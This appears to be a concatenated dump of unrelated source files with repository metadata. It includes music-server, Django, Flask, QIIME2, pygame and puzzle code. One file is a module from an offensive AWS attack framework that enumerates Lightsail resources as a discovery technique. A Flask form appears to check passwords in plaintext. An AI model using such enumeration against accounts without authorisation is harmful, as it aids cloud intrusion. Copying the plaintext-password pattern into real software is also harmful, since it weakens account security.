 ERR_NO_GOOD_LINES_FOUND: 'No good lines found for replacement of bad lines',
 ERR_NO_MATCHING_LINES_FOUND: 'No lines found with the given phrase'
}
|
[
"[email protected]"
] | |
3ce562a5e5b5881b87d936099c74eb0efc486b7b
|
05de912d5579e031a8ccaeb9b8ea70f1431b82ad
|
/mopidy/audio/mixers/__init__.py
|
feaccc3d077f9d2b34cbf8dfeb1dad65870713f2
|
[
"Apache-2.0"
] |
permissive
|
cave-scorpion/mopidy
|
bcb0939ddacb0bd295ad36c2b073b369869a15cf
|
5d83e3e97a47efcfa62558ba57fd394b8c311aa6
|
refs/heads/master
| 2021-01-16T22:16:21.134218 | 2013-03-31T14:59:30 | 2013-03-31T14:59:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 479 |
py
|
from __future__ import unicode_literals
import pygst
pygst.require('0.10')
import gst
import gobject
from .auto import AutoAudioMixer
from .fake import FakeMixer
from .nad import NadMixer
def register_mixer(mixer_class):
    """Expose *mixer_class* to GStreamer as an element.

    The element is registered under the lowercased class name with
    marginal rank, so GStreamer never auto-selects it.
    """
    element_name = mixer_class.__name__.lower()
    gobject.type_register(mixer_class)
    gst.element_register(mixer_class, element_name, gst.RANK_MARGINAL)
def register_mixers():
    """Register every bundled mixer element with GStreamer."""
    for mixer_class in (AutoAudioMixer, FakeMixer, NadMixer):
        register_mixer(mixer_class)
|
[
"[email protected]"
] | |
e6ba65a1e4349381acba5c01404dcd17efb2c8d3
|
f023692f73992354a0b7823d9c49ae730c95ab52
|
/AtCoderBeginnerContest/1XX/186/E_another.py
|
5cd6db2ce83b44b90602978bdf66cc3d4f96d6b5
|
[] |
no_license
|
corutopi/AtCorder_python
|
a959e733f9a3549fab7162023e414ac2c99c4abe
|
a2c78cc647076071549e354c398155a65d5e331a
|
refs/heads/master
| 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 |
Python
|
UTF-8
|
Python
| false | false | 1,876 |
py
|
"""
ไปฅไธใๅ่ใซไฝๆ
https://twitter.com/kyopro_friends/status/1341216644727676928
s + k * x โก 0 mod n ใ่งฃใ(xใๆฑใใ).
้ณฅใฎๅทฃๅ็ใใ x <= n ใฎใใ,
x = im + j (0 <= i, j <= m = n**0.5)
ใจ่กจใใ.
j ใ 0 ๏ฝ m ใฎๆใฎไฝ็ฝฎ(s + k * j mod n)ใๅ่จ็ฎใ,mapใซๆใฃใฆใใ(jmap).
s + k * (im + j) โก 0 mod n
s + k * j + k * im โก 0 mod n
((s + k * j) mod n) + (k * im mod n) = n or 0 โก 0 mod n
ใจ่กจใใใใ, ใใ i ใซๅฏพใใฆ
(k * im mod n) + p = n or 0
ใจใชใใใใช p ใ jmap ใซๅญๅจใใฆใใใฐ, ใใฎๆใฎ im + j ใ็ญใใจใชใ.
ใใใ i ใ 0 ๏ฝ m ใฎ็ฏๅฒใงๅ
จๆข็ดขใ, ๅญๅจใใฆใใชใใใฐ -1 ใจใชใ.
@Baby-Step Giant-Step
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
from collections import Counter
inf = float('inf')
mod = 10 ** 9 + 7
# from decorator import stop_watch
#
#
# @stop_watch
def solve(T, NSK):
for n, s, k in NSK:
m = int(n ** 0.5) + 1
jmap = {}
for j in range(m):
tmp = (s + k * j) % n
jmap.setdefault(tmp, j)
jmap[tmp] = min(j, jmap[tmp])
for i in range(m):
tmp = (n - (k * i * m) % n) % n
if jmap.get(tmp, - 1) >= 0:
print(i * m + jmap[tmp])
break
else:
print(-1)
if __name__ == '__main__':
T = int(input())
NSK = [[int(i) for i in input().split()] for _ in range(T)]
solve(T, NSK)
# # test
# from random import randint
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# T = 100
# NSK = []
# for _ in range(T):
# N = randint(1, 10 ** 9)
# S = randint(1, N - 1)
# K = randint(1, 10 ** 9)
# NSK.append([N, S, K])
# solve(T, NSK)
|
[
"[email protected]"
] | |
a3b8e7c2bd30a297c6acbb500964593d46332088
|
3d82768d4f912eb940a1238a3b6347c727e52558
|
/expense/migrations/0004_auto_20201024_1825.py
|
83e59278f488ec0faee9c08743a0a6ee6c64bc63
|
[] |
no_license
|
surajit003/tdd-expense-app
|
b4dd53c1328f4dd40b39593e09f8afe9e811ff4a
|
603c6f56ce35944c1acf8deefd6d7b420576e65d
|
refs/heads/main
| 2023-01-08T16:01:42.102279 | 2020-11-08T20:47:04 | 2020-11-08T20:47:04 | 305,830,003 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 723 |
py
|
# Generated by Django 3.1.2 on 2020-10-24 18:25
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 3.1.2): makes expense_id a CharField primary
    # key and `total` nullable/blank.

    dependencies = [("expense", "0003_auto_20201024_1816")]

    operations = [
        migrations.AlterField(
            model_name="expense",
            name="expense_id",
            field=models.CharField(
                # NOTE(review): this default is a single fixed UUID string,
                # captured once at makemigrations time — every row created
                # without an explicit expense_id would get the SAME primary
                # key value.  The model should use a callable (e.g.
                # uuid.uuid4) instead; confirm against the current model.
                default="d3ccef36-3709-4d60-b5fe-d673ee9d3933",
                max_length=120,
                primary_key=True,
                serialize=False,
            ),
        ),
        migrations.AlterField(
            model_name="expense",
            name="total",
            field=models.FloatField(blank=True, null=True, verbose_name="Total"),
        ),
    ]
|
[
"[email protected]"
] | |
2e43ad66add5cc370ee3dc18b1754c8d45d8b1fe
|
31eaed64b0caeda5c5fe3603609402034e6eb7be
|
/ignorancia_zero/iz_aula-064 - programaรงรฃo orientada a objetos.py
|
e7aa8a74376c2e9fbd0ede1bee421dec1ba61654
|
[] |
no_license
|
RaphaelfsOliveira/workspace_python
|
93657b581043176ecffb5783de208c0a00924832
|
90959697687b9398cc48146461750942802933b3
|
refs/heads/master
| 2021-01-11T17:39:49.574875 | 2017-06-28T20:55:43 | 2017-06-28T20:55:43 | 79,814,783 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,418 |
py
|
# Special constructor method.
# Instantiates the object.
'__init__'
# Returns the object's attributes in dictionary form.
'__dict__'
# Converts the object to a string; must always return a string.
'__str__'
# Performs operations with another instance of the object, only via the
# + - / * operators.
'__add__'
# Prints the documentation written in the instantiated object's class.
'__doc__'
class Conta(object):
    '''The Conta object represents a bank account.'''

    def __init__(self, ID, saldo):
        '''Create an account with the given ID and balance (saldo).'''
        self.ID = ID
        self.saldo = saldo

    def __str__(self):
        '''Render the account as a string, e.g. "ID: 1\\nSaldo R$: 5000.00".'''
        return 'ID: %d\nSaldo R$: %.2f' %(self.ID, self.saldo)

    def __add__(self, outro):
        '''Combine two accounts with the + operator.

        Fixed: the original mutated `self` and returned None, so the
        expression ``a + b`` evaluated to None while silently changing
        `a`.  An operator method must return the result; this now returns
        a new account holding the summed balance (keeping self's ID) and
        leaves both operands untouched.
        '''
        return Conta(self.ID, self.saldo + outro.saldo)

    def __call__(self, x):
        '''Make the object callable; returns its argument unchanged.'''
        return x
# Demo: create two accounts and inspect the introspection dunders.
bra = Conta(123, 5000)
ita = Conta(456, 8000)
print(bra.__dict__, '__dict__ devolve o objeto como dicionario')
print(bra.__doc__, '__doc__ documentaรงรฃo da classe do objeto')
# Scratch notes kept as an unassigned string literal (evaluated and
# discarded; no runtime effect).
'''
>>> class Pai:
pass
>>> class Filho(Pai):
pass
>>> class Neto(Filho):
pass
>>> issubclass(Pai, Filho)
False
>>> issubclass(Filho, Pai)
True
>>> Filho.__bases__
(<class '__main__.Pai'>,)
>>> Neto.__bases__
(<class '__main__.Filho'>,)
'''
|
[
"[email protected]"
] | |
bfb960beefa750bcc845e2efc49507af9740647a
|
52a61caff0aeb434c32e5657e38762643e9f57dd
|
/DataStructuresAndAlgorithms/SearchAndSort/Search/BinarySearch/functionBinarySearch.py
|
6a7e15608caca8460acd2988b9f9a53c5f770492
|
[] |
no_license
|
AndrewErmakov/PythonTrainingBasics
|
1480a6378d1ec59884760e2b3014ccc3d28f058f
|
639e15bbfc54da762cb9e366497754cfece30691
|
refs/heads/master
| 2021-06-10T15:57:58.682335 | 2021-03-25T13:37:30 | 2021-03-25T13:37:30 | 153,678,760 | 0 | 0 | null | 2018-10-30T13:52:51 | 2018-10-18T19:45:47 |
Python
|
UTF-8
|
Python
| false | false | 596 |
py
|
def binary_search(list_num: list, number: int) -> "int | None":
    """Return the index of *number* in the sorted list, or None if absent.

    Fixed: the annotation said ``-> int`` and the (Russian) docstring
    promised "NOT FOUND" output, but the function actually returns None
    when the value is missing — signature and docstring now match.
    """
    low_border = 0
    high_border = len(list_num) - 1
    while low_border <= high_border:
        # Midpoint written in the canonical overflow-safe form (harmless
        # in Python, where ints are unbounded).
        mid = low_border + (high_border - low_border) // 2
        guess = list_num[mid]
        if guess == number:
            return mid
        if guess > number:
            high_border = mid - 1
        else:
            low_border = mid + 1
    return None


if __name__ == "__main__":
    # Demo call, guarded so importing this module has no side effects.
    print(binary_search([1, 3, 5, 7, 9], 3))
|
[
"[email protected]"
] | |
06b82317f341de041aa076425ac0ea6a0b157357
|
fdb9b553a23647f7ea06f690613707c40b54902f
|
/src/main/resources/resource/LocalSpeech/LocalSpeech.py
|
3c699a5680887399d9993fd401bcfa08d5ebce64
|
[
"CC-BY-2.5",
"Apache-2.0"
] |
permissive
|
ShaunHolt/myrobotlab
|
d8d9f94e90457474cf363d36f4a45d396cfae900
|
92046d77abd560f0203050b3cccb21aa9df467f2
|
refs/heads/develop
| 2021-07-08T04:55:01.462116 | 2020-04-18T19:58:17 | 2020-04-18T19:58:17 | 122,795,957 | 0 | 0 |
Apache-2.0
| 2020-04-18T19:58:18 | 2018-02-25T01:37:54 |
Java
|
UTF-8
|
Python
| false | false | 886 |
py
|
#########################################
# LocalSpeech.py
# description: used as a general template
# categories: speech
# more info @: http://myrobotlab.org/service/LocalSpeech
#########################################
# start the service
mouth = Runtime.start('mouth','LocalSpeech')
# possible voices ( selected voice is stored inside config until you change it )
print ("these are the voices I can have", mouth.getVoices())
print ("this is the voice I am using", mouth.getVoice())
# ( macOs )
# set your voice from macos control panel
# you can test it using say command from terminal
# mouth.setVoice("Microsoft Zira Desktop - English (United States)")
# speakBlocking waits for the utterance to finish before returning.
mouth.speakBlocking(u"Hello this is an english voice")
mouth.speakBlocking(u"Bonjour ceci est une voix franรงaise, je teste les accents aussi avec le mot รฉlรฉphant")
# Lower the output gain, then speak once more at the reduced volume.
mouth.setVolume(0.7)
mouth.speakBlocking("Silent please")
|
[
"[email protected]"
] | |
474938eddcd278b842c02f4bc13beab9969ae5d4
|
cbf448f9fa287b38a6b175040141e9ee445cfcd1
|
/DNN_3L/evaluation_matrics.py
|
cbb95bef1984a401aac76d2f267d039a67d8c78a
|
[] |
no_license
|
rnaimehaom/SST-Result
|
271c115d6ab1f14265169d98f604d4a63c71184e
|
829029b060010b2928032b3d6728c660b538b5cf
|
refs/heads/main
| 2023-03-27T23:17:53.935109 | 2021-04-09T02:49:58 | 2021-04-09T02:49:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,284 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 15:39:34 2020
@author: tanzheng
"""
import pickle
import numpy as np
with open('DNN_3L_SST_predict.pkl', 'rb') as f:
MT_predict_result = pickle.load(f)
f.close()
first_pred_out_y, second_pred_out_y, out_prop_y, tasks = MT_predict_result
No_samples = out_prop_y.shape[0]
np_fir_pred_out_y = np.empty(shape=(No_samples, 0))
np_sec_pred_out_y = np.empty(shape=(No_samples, 0))
for i in range(len(first_pred_out_y)):
np_fir_pred_out_y = np.hstack((np_fir_pred_out_y, first_pred_out_y[i]))
np_sec_pred_out_y = np.hstack((np_sec_pred_out_y, second_pred_out_y[i]))
# target RRMSE
# single target
single_task_RRMSE = []
for i in range(len(tasks)):
temp_ST_RRMSE = sum(np.square(out_prop_y[:,i]-np_fir_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_ST_RRMSE = np.sqrt(temp_ST_RRMSE)
single_task_RRMSE.append(temp_ST_RRMSE)
# multi target
multi_task_RRMSE = []
for i in range(len(tasks)):
temp_MT_RRMSE = sum(np.square(out_prop_y[:,i]-np_sec_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_MT_RRMSE = np.sqrt(temp_MT_RRMSE)
multi_task_RRMSE.append(temp_MT_RRMSE)
|
[
"[email protected]"
] | |
ef5cfcba95a6606c5510682302bc8b7563f002b6
|
e90bf4b372da78ceec15282d060b48d18ba8d4e9
|
/supervisor/backups/const.py
|
c4b5e593e438d1e447c34ebcb2e8cc63ca5d919e
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/supervisor
|
67f2e1755ff5fbf7cf2084351e1c32c6995274e0
|
4838b280adafed0997f32e021274b531178386cd
|
refs/heads/main
| 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 |
Apache-2.0
| 2023-09-14T17:11:27 | 2017-03-14T08:54:15 |
Python
|
UTF-8
|
Python
| false | false | 945 |
py
|
"""Backup consts."""
from enum import StrEnum
BUF_SIZE = 2**20 * 4 # 4MB
class BackupType(StrEnum):
    """Backup type enum."""

    # StrEnum members: each compares equal to its string value.
    FULL = "full"
    PARTIAL = "partial"
class BackupJobStage(StrEnum):
    """Backup job stage enum."""

    # Named stages of a backup job (StrEnum: members are plain strings).
    # Presumably reported as job progress labels — confirm in the job code.
    ADDON_REPOSITORIES = "addon_repositories"
    ADDONS = "addons"
    DOCKER_CONFIG = "docker_config"
    FINISHING_FILE = "finishing_file"
    FOLDERS = "folders"
    HOME_ASSISTANT = "home_assistant"
    AWAIT_ADDON_RESTARTS = "await_addon_restarts"
class RestoreJobStage(StrEnum):
    """Restore job stage enum."""

    # Named stages of a restore job; superset of the backup stages plus
    # restore-specific steps (restarts, health check, delta add-on removal).
    ADDON_REPOSITORIES = "addon_repositories"
    ADDONS = "addons"
    AWAIT_ADDON_RESTARTS = "await_addon_restarts"
    AWAIT_HOME_ASSISTANT_RESTART = "await_home_assistant_restart"
    CHECK_HOME_ASSISTANT = "check_home_assistant"
    DOCKER_CONFIG = "docker_config"
    FOLDERS = "folders"
    HOME_ASSISTANT = "home_assistant"
    REMOVE_DELTA_ADDONS = "remove_delta_addons"
|
[
"[email protected]"
] | |
c553d74eaa132d25fe4fc5ed0e0a10d05a9ff9e5
|
f2a55f94783fed2a53bc2ff1a0096cfdb75dc5a3
|
/3rd Year Diatomic Simulation Exercise/Particle1D.py
|
9b7e688d4446b103fb241661e708022f216dd910
|
[] |
no_license
|
callous4567/UoE-Projects
|
c7b307878ae1d6b7e00227bb1a681aec2ad55b1f
|
5a4ee803f70f7da9d860f905114a71278c7f50e7
|
refs/heads/master
| 2023-02-18T22:19:25.496429 | 2023-02-13T01:00:19 | 2023-02-13T01:00:19 | 245,646,389 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,034 |
py
|
"""
CMod Ex2: Particle1D, a class to describe 1D particles
"""
class Particle1D(object):
    """A point particle confined to one dimension.

    Attributes:
        position (float): coordinate along the x axis
        velocity (float): velocity along the x axis
        mass     (float): particle mass

    Offers formatted printing, kinetic energy, a first-order velocity
    update, and first- and second-order position updates.
    """

    def __init__(self, pos, vel, mass):
        """Store position, velocity and mass for a new particle.

        :param pos: position as float
        :param vel: velocity as float
        :param mass: mass as float
        """
        self.position = pos
        self.velocity = vel
        self.mass = mass

    def __str__(self):
        """Format as e.g. "x = 2.0, v = 0.5, m = 1.0"."""
        return f"x = {self.position}, v = {self.velocity}, m = {self.mass}"

    def kinetic_energy(self):
        """Return the kinetic energy, mass*vel^2/2."""
        return self.mass * self.velocity ** 2 / 2

    # --- time integration -------------------------------------------------

    def leap_velocity(self, dt, force):
        """First-order velocity update: v(t+dt) = v(t) + dt*F(t)/m.

        :param dt: timestep as float
        :param force: force on the particle as float
        """
        self.velocity += force * dt / self.mass

    def leap_pos1st(self, dt):
        """First-order position update: x(t+dt) = x(t) + dt*v(t).

        :param dt: timestep as float
        """
        self.position += self.velocity * dt

    def leap_pos2nd(self, dt, force):
        """Second-order position update: x(t+dt) = x(t) + dt*v(t) + dt^2*F(t)/(2m).

        :param dt: timestep as float
        :param force: current force as float
        """
        self.position += self.velocity * dt + 0.5 * dt ** 2 * force / self.mass
# Smoke test.  Fixed: Particle1D requires pos, vel and mass — the
# original called Particle1D() with no arguments, which raises TypeError.
hey = Particle1D(0.0, 0.0, 1.0)
print(hey.position)
|
[
"[email protected]"
] | |
d2797398c8da6c4fb49aafc3d736a1391d150f12
|
b6f0b3932f8cdee542f3f1fe7f5c27c67e5d1c2d
|
/conf/train_conf_dense_7.py
|
1c88e9db0a9644002cbed124c0e05c35b5d75b9d
|
[] |
no_license
|
fuding/codes_for_sicheng
|
dcab85b66d9f3a0f0c78c5e471223d919a3d14f7
|
c8ba21572921ba0aa9686174305ab48fa614cd5d
|
refs/heads/master
| 2022-02-26T16:32:01.253870 | 2019-10-11T06:10:27 | 2019-10-11T06:10:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,453 |
py
|
from easydict import EasyDict
def get_config():
    """Assemble the EasyDict of training settings for the dense_7 MultiHDR run."""
    conf = EasyDict()

    # model identity
    conf.arch = "dense_7"
    conf.model = "MultiHDR"
    conf.model_name = conf.arch + ""

    # execution environment
    conf.use_cpu = False
    conf.is_train = True
    conf.gpu_ids = [0]

    # optimisation schedule
    conf.epoch = 400
    conf.start_epoch = 0
    conf.learning_rate = 0.0002
    conf.beta1 = 0.5
    conf.loss = 'l2'  # l1 or l2
    conf.lr_scheme = "MultiStepLR"
    conf.lr_steps = [100 * 2387]
    conf.lr_gamma = 0.1

    # dataset
    conf.dataset_dir = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/"
    conf.exp_path = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/exp.json"
    conf.dataset_name = 'Multi_LDR_HDR'
    conf.batch_size = 8
    conf.load_size = 256
    conf.fine_size = 256
    conf.c_dim = 3
    conf.num_shots = 3
    conf.n_workers = 4
    conf.use_shuffle = True

    # logging / checkpoint output
    conf.use_tb_logger = True
    conf.experiments_dir = "../../experiments/" + conf.model_name
    conf.log_dir = "../../tb_logger/" + conf.model_name
    conf.save_freq = 2000
    conf.print_freq = 200

    # checkpoint resuming (disabled; kept from the original for reference):
    # conf.resume_step = 78000
    # conf.pretrained = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/models/' + str(
    #     conf.resume_step) + '_G.pth'
    # conf.resume = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/training_state/' + str(
    #     conf.resume_step) + '.state'
    conf.pretrained = None
    conf.resume = None
    return conf
|
[
"[email protected]"
] | |
c3025edb9e0a4bfafad31ec4def223cfdd8a6809
|
3cc2f47de6d78d610a2887f92bfba150b2994888
|
/application/forms/account.py
|
b709a49955ab50546f45efab620eda042081cd50
|
[] |
no_license
|
fengliu222/blogbar
|
c8a66df586187d0a16063e4536e76d155863fe17
|
ff6e7182f000777112101eed12ae9e2ca4298d25
|
refs/heads/master
| 2021-01-15T08:59:51.478354 | 2014-12-20T08:13:53 | 2014-12-20T08:13:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,142 |
py
|
# coding: utf-8
from flask_wtf import Form
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired, Email
from ..models import User
class SigninForm(Form):
    """Form for signin"""
    email = StringField('้ฎ็ฎฑ',
                        validators=[
                            DataRequired(),
                            Email()
                        ],
                        description='Email')
    password = PasswordField('ๅฏ็ ',
                             validators=[DataRequired()],
                             description='Password')

    def validate_email(self, field):
        # In-line validator (wtforms convention: validate_<fieldname>).
        # Raising ValueError marks the field invalid with this message.
        user = User.query.filter(User.email == self.email.data).first()
        if not user:
            raise ValueError("Account doesn't exist.")

    def validate_password(self, field):
        # NOTE(review): this filters on User.password equal to the raw
        # submitted text, which implies passwords are stored in plaintext —
        # confirm; they should be hashed and verified instead.
        if self.email.data:
            user = User.query.filter(User.email == self.email.data,
                                     User.password == self.password.data).first()
            if not user:
                raise ValueError('Password cannot match the Email.')
            else:
                # Stash the matched user so the view can log them in.
                self.user = user
|
[
"[email protected]"
] | |
8d3c1b8bce69b57d0d51802846a66c1e439b70e4
|
ca4faa1c6d4d87d1702b2c42a64ea6a063d71de9
|
/q2_micom/_transform.py
|
bc96be1fc23acd5496509e2495ad09d70dc7cd8b
|
[
"Apache-2.0"
] |
permissive
|
Gibbons-Lab/q2-micom
|
cb0ed1185a50248eae94a415e03443dbacfa8bfb
|
2d954d4f584675c29aa2eccb5245e4469f1740b6
|
refs/heads/master
| 2020-12-07T08:48:10.020690 | 2020-01-07T23:27:39 | 2020-01-07T23:27:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,558 |
py
|
"""Transformers for MICOM types."""
import pandas as pd
from q2_micom.plugin_setup import plugin
import q2_micom._formats_and_types as ft
@plugin.register_transformer
def _1(data: pd.DataFrame) -> ft.MicomMediumFile:
    # Serialize a DataFrame into a MicomMediumFile artifact (CSV on disk).
    mm = ft.MicomMediumFile()
    data.to_csv(str(mm), index=False)
    return mm


@plugin.register_transformer
def _2(mm: ft.MicomMediumFile) -> pd.DataFrame:
    # Inverse of _1: load the MicomMediumFile artifact back into a DataFrame.
    return pd.read_csv(str(mm), index_col=False)
@plugin.register_transformer
def _3(data: pd.DataFrame) -> ft.ModelManifest:
    """Serialize a DataFrame into a ModelManifest artifact (CSV on disk)."""
    # Fixed: previously instantiated ft.SBMLManifest, which contradicted both
    # the declared return type above and the ModelManifest consumed by the
    # paired reader _4 — apparently a leftover from a format rename.
    manifest = ft.ModelManifest()
    data.to_csv(str(manifest), index=False)
    return manifest
@plugin.register_transformer
def _4(sbm: ft.ModelManifest) -> pd.DataFrame:
    # ModelManifest artifact -> DataFrame.
    return pd.read_csv(str(sbm), index_col=False)


@plugin.register_transformer
def _5(data: pd.DataFrame) -> ft.CommunityModelManifest:
    # DataFrame -> CommunityModelManifest artifact (CSV on disk).
    cmm = ft.CommunityModelManifest()
    data.to_csv(str(cmm), index=False)
    return cmm


@plugin.register_transformer
def _6(cmm: ft.CommunityModelManifest) -> pd.DataFrame:
    # CommunityModelManifest artifact -> DataFrame.
    return pd.read_csv(str(cmm), index_col=False)


@plugin.register_transformer
def _7(data: pd.DataFrame) -> ft.GrowthRates:
    # DataFrame -> GrowthRates artifact (CSV on disk).
    gr = ft.GrowthRates()
    data.to_csv(str(gr), index=False)
    return gr


@plugin.register_transformer
def _8(gr: ft.GrowthRates) -> pd.DataFrame:
    # GrowthRates artifact -> DataFrame.
    return pd.read_csv(str(gr), index_col=False)


@plugin.register_transformer
def _9(data: pd.DataFrame) -> ft.Fluxes:
    # DataFrame -> Fluxes artifact; parquet is used here (unlike the CSV
    # formats above), presumably because flux tables are large.
    ef = ft.Fluxes()
    data.to_parquet(str(ef))
    return ef


@plugin.register_transformer
def _10(ef: ft.Fluxes) -> pd.DataFrame:
    # Fluxes artifact -> DataFrame.
    return pd.read_parquet(str(ef))
|
[
"[email protected]"
] | |
3f3fb632bea88ffa2e488c584544669d6e396c19
|
f7328c45c872b69c3b7c2a2bf563257f51e5fbff
|
/src/sound.py
|
02015b9b715fb2938284ce88bb0d22e84a8a2496
|
[
"MIT"
] |
permissive
|
whoji/banjiu_2048
|
ffc45ff9e0b65cccea2b3cc6e91b233db9f7ae79
|
d99522f2f0f6d159b5ecb49d023ee06da5f0f5a5
|
refs/heads/master
| 2020-04-21T04:01:06.870805 | 2019-02-10T09:09:31 | 2019-02-10T09:09:31 | 169,301,201 | 0 | 0 | null | 2019-02-07T03:58:40 | 2019-02-05T19:42:21 |
Python
|
UTF-8
|
Python
| false | false | 2,088 |
py
|
import pygame
from flags import F
class SoundPlayer(object):
    """Loads the game's sound effects once and plays the effect matching the
    current game status and per-frame events."""

    def __init__(self, pygame):
        # Handle to the (already initialised) pygame module; mixer must be ready.
        self.pygame = pygame
        self.__load_sound()
        # Guards one-shot sounds (menu jingle, game over) against re-triggering
        # on every frame while the status is unchanged.
        self.is_playing = False

    def __load_sound(self):
        # Map logical effect names to mixer Sound objects loaded from assets.
        self.sounds = {
            'move' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_1.wav'),
            'merge' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_2.wav'),
            'castle' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_3.wav'),
            'main_menu' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/sfx_sounds_powerup2.wav'),
            'game_over' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
            'game_finish' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
        }
        # Quiet the frequently played / loud effects.
        self.sounds['move'].set_volume(0.3)
        self.sounds['main_menu'].set_volume(0.5)
        self.sounds['game_over'].set_volume(0.3)
        self.sounds['game_finish'].set_volume(0.3)

    def play_sound_effect(self, event, game_status):
        # game_status: 1 = main menu, 4 = game over, 6 = game finished
        # (per the inline comments below); anything else is in-game.
        if game_status == 1: # main menu
            if not self.is_playing:
                self.sounds['main_menu'].play()
                self.is_playing = True
            return
        elif game_status == 4:
            if not self.is_playing:
                self.sounds['game_over'].play()
                self.is_playing = True
            return
        elif game_status == 6:
            if not self.is_playing:
                self.sounds['game_finish'].play()
                self.is_playing = True
            return
        else:
            # NOTE(review): both event[2] (upgrade) and event[3] (cancelled
            # list) play 'castle'; the commented-out code below suggests
            # 'merge'/'move' were once intended for events 1/0 — confirm.
            if event[2]: # upgrade
                self.sounds['castle'].play()
                return
            if event[3]: # cancelled_list is not empty
                self.sounds['castle'].play()
                return
            #elif event[1]:
            #    self.sounds['merge'].play()
            #elif event[0]:
            #    self.sounds['move'].play()

    def play_action_sound(self):
        # Generic movement blip, triggered directly by the caller.
        self.sounds['move'].play()
|
[
"[email protected]"
] | |
a76b4bd5db57d7d3f6e4f183973cdbe0b2485ff0
|
700c7801958dd4789caf94785b5dc8c5e3daa4fd
|
/ttp/lightsail_enum_keypairs.py
|
b60a67c5e6315a9d9da0f5817af2698ca230cd17
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
blackbotsecurity/AWS-Attack
|
24d4cd6ebda067e9672f4f963d414a7b176e3551
|
ad4668ab60173aabce3c6b9c7685160be5e3f14d
|
refs/heads/master
| 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,612 |
py
|
#!/usr/bin/env python3
import datetime
#'description': "This module examines Lightsail data fields and automatically enumerates them for all available regions. Available fields can be passed upon execution to only look at certain types of data. By default, all Lightsail fields will be captured.",
import argparse
from botocore.exceptions import ClientError
import importlib
# Unused placeholder retained for framework compatibility.
target = ''

# Static metadata describing this TTP module; read by the AWS-Attack
# framework's loader and reporting layer.
technique_info = {
    'blackbot_id': 'T1526.b.001',
    'external_id': '',
    'controller': 'lightsail_enum_keypairs',
    'services': ['Lightsail'],
    'external_dependencies': [],
    'arguments_to_autocomplete': [],
    'version': '1',
    'aws_namespaces': [],
    'last_updated_by': 'Blackbot, Inc. Sun Sep 20 04:13:33 UTC 2020' ,
    'ttp_exec': '',
    'ttp_mitigation': '',
    'ttp_detection': '',
    'intent': 'Captures common data associated with Lightsail',
    'name': 'Cloud Service Discovery: Lightsail' ,
}

# Module-level argument parser; main() feeds the raw argument list through it.
parser = argparse.ArgumentParser(add_help=False, description=technique_info['name'])
def main(args, awsattack_main):
    """Parse the raw argument list and delegate to the freshly (re)loaded
    implementation module, marking the framework session as chained."""
    parsed = parser.parse_args(args)
    module = importlib.import_module('ttp.src.lightsail_enum_keypairs_src')
    importlib.reload(module)
    awsattack_main.chain = True
    return module.main(parsed, awsattack_main)
def summary(data, awsattack_main):
    """Render the post-run report for the enumerated Lightsail data.

    Side effect: removes the 'regions' key from *data* after listing it;
    every remaining key is reported as "<count> <field>(s) enumerated".
    """
    report = '  Regions Enumerated:\n'
    for region in data['regions']:
        report += '    {}\n'.format(region)
    del data['regions']
    for field, count in data.items():
        report += '    {} {} enumerated\n'.format(count, field[:-1] + '(s)')
    return report
|
[
"[email protected]"
] | |
1a7bacfc9808852cf7b990a159af019328d3deb0
|
9c0f691393abbeb5754e1624e0c48dfcdf857352
|
/2017/Helpers/day_06.py
|
b8fc0de773effcccfda5ee364b548908e7b0101b
|
[] |
no_license
|
seligman/aoc
|
d0aac62eda3e6adc3c96229ca859bd2274398187
|
9de27ff2e13100770a3afa4595b15565d45bb6bc
|
refs/heads/master
| 2023-04-02T16:45:19.032567 | 2023-03-22T15:05:33 | 2023-03-22T15:05:33 | 230,493,583 | 17 | 10 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,540 |
py
|
#!/usr/bin/env python3
DAY_NUM = 6  # Advent of Code 2017 day number (used to locate the input file)
DAY_DESC = 'Day 6: Memory Reallocation'
def calc(log, values, redo):
    """Redistribute memory banks until a configuration repeats.

    values[0] holds the whitespace-separated bank sizes. With redo == 0 the
    return value is how many steps run before any repeat (part 1); each extra
    `redo` restarts the seen-set at a repeat, so redo == 1 yields the cycle
    length (part 2). `log` is unused but kept for the shared day interface.
    """
    banks = [int(tok) for tok in values[0].replace("\t", " ").split(" ")]
    history = set()
